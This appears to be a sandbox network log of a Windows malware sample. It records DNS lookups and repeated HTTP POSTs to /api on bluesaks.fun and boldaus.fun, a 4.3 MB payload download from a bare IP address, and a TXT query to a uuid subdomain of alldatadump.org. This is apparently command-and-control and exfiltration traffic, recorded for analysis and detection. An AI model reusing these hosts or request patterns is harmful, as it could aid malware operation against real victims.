                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                            • flag-us
                                                                                              DNS
                                                                                              5a4089b6-ced1-4073-a7ce-6ff2269b31f0.uuid.alldatadump.org
                                                                                              csrss.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              5a4089b6-ced1-4073-a7ce-6ff2269b31f0.uuid.alldatadump.org
                                                                                              IN TXT
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              msdl.microsoft.com
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              msdl.microsoft.com
                                                                                              IN A
                                                                                              Response
                                                                                              msdl.microsoft.com
                                                                                              IN CNAME
                                                                                              msdl.microsoft.akadns.net
                                                                                              msdl.microsoft.akadns.net
                                                                                              IN CNAME
                                                                                              msdl-microsoft-com.a-0016.a-msedge.net
                                                                                              msdl-microsoft-com.a-0016.a-msedge.net
                                                                                              IN CNAME
                                                                                              a-0016.a-msedge.net
                                                                                              a-0016.a-msedge.net
                                                                                              IN A
                                                                                              204.79.197.219
                                                                                            • flag-us
                                                                                              DNS
                                                                                              vsblobprodscussu5shard30.blob.core.windows.net
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              vsblobprodscussu5shard30.blob.core.windows.net
                                                                                              IN A
                                                                                              Response
                                                                                              vsblobprodscussu5shard30.blob.core.windows.net
                                                                                              IN CNAME
                                                                                              blob.sat09prdstrz08a.store.core.windows.net
                                                                                              blob.sat09prdstrz08a.store.core.windows.net
                                                                                              IN CNAME
                                                                                              blob.SAT09PrdStrz08A.trafficmanager.net
                                                                                              blob.SAT09PrdStrz08A.trafficmanager.net
                                                                                              IN A
                                                                                              20.150.79.68
                                                                                              blob.SAT09PrdStrz08A.trafficmanager.net
                                                                                              IN A
                                                                                              20.150.38.228
                                                                                              blob.SAT09PrdStrz08A.trafficmanager.net
                                                                                              IN A
                                                                                              20.150.70.36
                                                                                            • flag-us
                                                                                              DNS
                                                                                              bluesaks.fun
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              bluesaks.fun
                                                                                              IN A
                                                                                              Response
                                                                                              bluesaks.fun
                                                                                              IN A
                                                                                              104.21.34.166
                                                                                              bluesaks.fun
                                                                                              IN A
                                                                                              172.67.163.21
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              104.21.34.166:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h%2BRUaKaqhjoP6BnUEhLsa7ep%2B3tDUvRqqawAZ2K9BmdyRPn1NChjHGFX7PX403IcmQz7aAywdFVK3iC%2F1liSZuxUOmBMDV1YwLNltPvgPAvcjR6dog7xwZYtUQ3%2BQYQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2558a4aa4b962-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              104.21.34.166:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=f4fj948sqv77g5fg16u58v13k1; expires=Sat, 17 Feb 2024 06:35:06 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:27 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S0KcMGgTjKz%2FUyDL83lgbfru%2FznZZ0HneFgYu%2F6s8dT48TVRnB53zTFLIT3JD7PQs6rpPeaVLPZ4mD4QCcT3fEvJkTUXvMHTVnXY4TTLL%2BQq12a8FaeFWDq%2FfqTggjE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2558e0e48b962-AMS
                                                                                            • flag-us
                                                                                              DNS
                                                                                              boldaus.fun
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              boldaus.fun
                                                                                              IN A
                                                                                              Response
                                                                                              boldaus.fun
                                                                                              IN A
                                                                                              104.21.28.22
                                                                                              boldaus.fun
                                                                                              IN A
                                                                                              172.67.170.47
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              104.21.34.166:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Host: bluesaks.fun
                                                                                              Content-Length: 47
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=l6n8da2m2iugauerh0pkmp1bia; expires=Sat, 17 Feb 2024 06:35:06 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:27 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wdNaiDVxl1h8B5CwwZUN%2FgTZo2597deOoowZK%2BNkJwT%2BKcI6fHneAQihmIK%2BzCERXQag4HCOsahynDHiQ9N4CmRxrtfQTjUtAV6Si3%2Fw%2FzQomh6KlHecP8QwebHCXSc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2558cdaaa0a6d-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mBd7ULtqCcct%2B003VG4gb%2BiSdvlOpklZWgUKEvPcvmItJPBlmsC7QcfYc5JLn%2BEgpy3pk%2FjrFZF6MRBCQ%2BsCjW5QfoHMqnD52fr%2Bw62CJWAFPPkKY%2FIBa3amWPs7HA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2558cdc5d6613-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=nqv6fn306936fbaq6vuin617pn; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fipRs6yBMiD71rveAUVx8FHhV1QO7I%2B64AzMC6pTIJ4qG4Pr3nelgSYVPuoB3hB9QXRaml%2FtMehcHNbM4ZXzcbQeGve16HCvcVEnI4KKjzIZ4EBEVBfqWSHj0gJR8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2558f1edf6613-AMS
                                                                                            • flag-us
                                                                                              DNS
                                                                                              boldaus.fun
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              boldaus.fun
                                                                                              IN A
                                                                                              Response
                                                                                              boldaus.fun
                                                                                              IN A
                                                                                              104.21.28.22
                                                                                              boldaus.fun
                                                                                              IN A
                                                                                              172.67.170.47
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Host: boldaus.fun
                                                                                              Content-Length: 79
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=j15hijp0st2h9okrn09hpsc296; expires=Sat, 17 Feb 2024 06:35:06 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:27 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Naj43FA3c1qiF5GfPU4VmjBgxl9X3vO6yMO0E71dTxvoSXNHC3SGgHc48pXJuFRRFm1Q8R2AOjMlOgbKi7YPbu%2FuvwcmHn1pVMqhLWTppgcu9NwhcjS0k%2Bf4QKc68w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2558dedb866e0-AMS
                                                                                            • flag-us
                                                                                              DNS
                                                                                              bluesaks.fun
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              bluesaks.fun
                                                                                              IN A
                                                                                              Response
                                                                                              bluesaks.fun
                                                                                              IN A
                                                                                              172.67.163.21
                                                                                              bluesaks.fun
                                                                                              IN A
                                                                                              104.21.34.166
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=4abfummrqs502tm6se6dl7ur8u; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GH5zzQSV2EBJ5V5WVHG1b7jPAwwWo6CT6FvktIsUEuI31OlB33IlZZTBXRuXb7ITqlOFuSer9DTrVtX50w60zdB6u%2BaJKFNppB474rLby3uqPDy3XAOLwDW9Bhi%2BBFk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2558f2a6a655e-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=hlbloousi6d6nk14b2ivreoa81; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e06ISdVXJxTsx3OPOAkBe%2BjbzCvQ8Qs3S6tgndSCj39ors%2B0XqypYWw2FOWxkvJ1tl8IaeJEJjDTH3sDshoGebhADHqwXA9idUN2mSwpBTk0uoigNyTzCU9889VDZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2559038ef0bda-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=r9pt5npstm4t3mraoatj6nmh2l; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i5as2qlNcp5czjmDUQJeRO4gWl9qfodx6ObFKnQ3RY5CDX5YEIEwOe5FXX7oY3jQc4LkVyI7%2F4GjJEL2a5vY1wjmAATp8hFJbvg8pgTpj7GKJ7mtvX%2FE%2F89lXHMpDQY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255904b15664a-AMS
                                                                                            • flag-us
                                                                                              GET
                                                                                              http://45.61.160.199/spps/Oysrywhpv.dat
                                                                                              Remote address:
                                                                                              45.61.160.199:80
                                                                                              Request
                                                                                              GET /spps/Oysrywhpv.dat HTTP/1.1
                                                                                              Host: 45.61.160.199
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Mon, 23 Oct 2023 12:37:48 GMT
                                                                                              ETag: "420036-608617d577f00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 4325430
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=vslh3h3m3ufevabeifseshu2ae; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FfGz%2F4TMbVMZ5Am2oTd1YNzYSFK5ot3LK90tSlKpJOjmOFwmVqyHZozyOgRtpmi%2F2%2BLWw27oFG259Mnrd0dF%2BUgOKkatHk%2BLqSCM8EB06vWQ%2F%2BsO7IcS2CDnS3xNoWs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b2559179a166f3-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://boldaus.fun/api
                                                                                              Remote address:
                                                                                              104.21.28.22:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=D_GWVs900j7AvUvW88.VX3qQPlGbsLK9OBfBUpsaaUY-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 534
                                                                                              Host: boldaus.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=g18c7am9ttef0scf48a8g3d6oo; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c9B2Tp%2BpB857exQCa9KBaWoMe%2BcnEt6eZUkIIxM2AxyJqhMjInH%2Bd%2F%2FItlEph92UFrj240EmaK71ycWP8AeVzpG5PLBpg7bjTn9ORScsGmXq2uQEZGf2kRe419XWGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 81b255918fb66710-AMS
                                                                                            • flag-us
                                                                                              POST
                                                                                              http://bluesaks.fun/api
                                                                                              Remote address:
                                                                                              172.67.163.21:80
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                              Cookie: __cf_mw_byp=7t_Y.6k.nwL6Kk9ow1_F903D0iyIjI.ToTsZ1Mki4n0-1698151707-0-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Length: 527
                                                                                              Host: bluesaks.fun
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Oct 2023 12:48:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Powered-By: PHP/8.2.7
                                                                                              Set-Cookie: PHPSESSID=b5d0mekij3vk1npbb1mr4nk7p7; expires=Sat, 17 Feb 2024 06:35:07 GMT; Max-Age=9999999; path=/
                                                                                              Set-Cookie: xdober_setting_show_country=1; expires=Sat, 23 Dec 2023 12:48:28 GMT; Max-Age=5184000; path=/
                                                                                              Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              CF-Cache-Status: DYNAMIC
